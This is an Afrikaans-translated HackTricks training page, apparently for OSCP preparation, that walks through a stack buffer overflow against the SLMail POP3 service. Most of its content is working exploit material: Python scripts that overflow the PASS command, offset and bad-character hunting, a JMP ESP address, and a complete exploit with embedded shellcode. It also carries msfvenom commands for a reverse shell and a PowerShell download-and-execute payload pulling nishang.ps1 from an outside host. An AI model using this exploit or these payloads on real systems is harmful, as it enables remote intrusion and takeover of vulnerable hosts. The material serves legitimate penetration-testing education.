hacktricks/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md

# Windows Exploiting (Basic Guide - OSCP lvl)

{{#include ../banners/hacktricks-training.md}}

## **Begin om die SLMail diens te installeer**

## Herbegin SLMail diens

Elke keer wanneer jy die **SLMail diens moet herbegin** kan jy dit doen met die Windows-konsol:
```
net start slmail
```
![](<../images/image (23) (1).png>)

## Baie basiese python ontploffing sjabloon
```python
#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

buffer = 'A' * 2700
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
```
## **Verander Immunity Debugger Lettertipe**

Gaan na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`

## **Koppel die proses aan Immunity Debugger:**

**File --> Attach**

![](<../images/image (24) (1) (1).png>)

**En druk START knoppie**

## **Stuur die exploit en kyk of EIP geraak word:**

![](<../images/image (25) (1) (1).png>)

Elke keer as jy die diens breek, moet jy dit herbegin soos aangedui aan die begin van hierdie bladsy.

## Skep 'n patroon om die EIP te verander

Die patroon moet so groot wees soos die buffer wat jy gebruik het om die diens voorheen te breek.

![](<../images/image (26) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
```
Verander die buffer van die exploit en stel die patroon in en begin die exploit.

'n Nuwe krag moet verskyn, maar met 'n ander EIP-adres:

![](<../images/image (27) (1) (1).png>)

Kontroleer of die adres in jou patroon was:

![](<../images/image (28) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
```
Dit lyk of **ons die EIP in offset 2606** van die buffer kan wysig.

Kontroleer dit deur die buffer van die exploit te wysig:
```
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
```
Met hierdie buffer het die EIP gekraak en moet na 42424242 ("BBBB") wys.

![](<../images/image (30) (1) (1).png>)

![](<../images/image (29) (1) (1).png>)

Dit lyk of dit werk.

## Kontroleer vir Shellcode ruimte binne die stapel

600B behoort genoeg te wees vir enige kragtige shellcode.

Kom ons verander die buffer:
```
buffer = 'A'*2606 + 'BBBB' + 'C'*600
```
laai die nuwe exploit en kyk na die EBP en die lengte van die nuttige shellcode

![](<../images/image (31) (1).png>)

![](<../images/image (32) (1).png>)

Jy kan sien dat wanneer die kwesbaarheid bereik word, die EBP na die shellcode wys en dat ons baie ruimte het om 'n shellcode hier te plaas.

In hierdie geval het ons **van 0x0209A128 tot 0x0209A2D6 = 430B.** Genoeg.

## Kontroleer vir slegte karakters

Verander weer die buffer:
```
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = 'A'*2606 + 'BBBB' + badchars
```
Die badchars begin by 0x01 omdat 0x00 amper altyd sleg is.

Voer herhaaldelik die exploit uit met hierdie nuwe buffer deur die karakters wat nutteloos blyk te wees, te verwyder:

Byvoorbeeld:

In hierdie geval kan jy sien dat **jy nie die karakter 0x0A moet gebruik nie** (niks word in geheue gestoor nie aangesien die karakter 0x09).

![](<../images/image (33) (1).png>)

In hierdie geval kan jy sien dat **die karakter 0x0D vermy word**:

![](<../images/image (34) (1).png>)

## Vind 'n JMP ESP as 'n terugadres

Gebruik:
```
!mona modules    #Get protections, look for all false except last one (Dll of SO)
```
U sal **die geheue kaarte** **lys**. Soek vir 'n DLl wat het:

- **Rebase: Vals**
- **SafeSEH: Vals**
- **ASLR: Vals**
- **NXCompat: Vals**
- **OS Dll: Waar**

![](<../images/image (35) (1).png>)

Nou, binne hierdie geheue moet u 'n paar JMP ESP bytes vind, om dit te doen voer uit:
```
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
```
**Dan, as 'n adres gevind word, kies een wat geen badchar bevat nie:**

![](<../images/image (36) (1).png>)

**In hierdie geval, byvoorbeeld: \_0x5f4a358f**\_

## Skep shellcode
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
```
As die exploit nie werk nie, maar dit behoort te werk (jy kan met ImDebg sien dat die shellcode bereik word), probeer om ander shellcodes te skep (msfvenom met verskillende shellcodes vir dieselfde parameters).

**Voeg 'n paar NOPS aan die begin** van die shellcode by en gebruik dit en die terugkeeradres om JMP ESP te doen, en voltooi die exploit:
```bash
#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

shellcode = (
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
"\x2d\xb8\x63\xe2\x4e\xe9"
)

buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
```
> [!WARNING]
> Daar is shellcodes wat **hulle self oorskryf**, daarom is dit belangrik om altyd 'n paar NOPs voor die shellcode by te voeg.

## Verbetering van die shellcode

Voeg hierdie parameters by:
```
EXITFUNC=thread -e x86/shikata_ga_nai
```
{{#include ../banners/hacktricks-training.md}}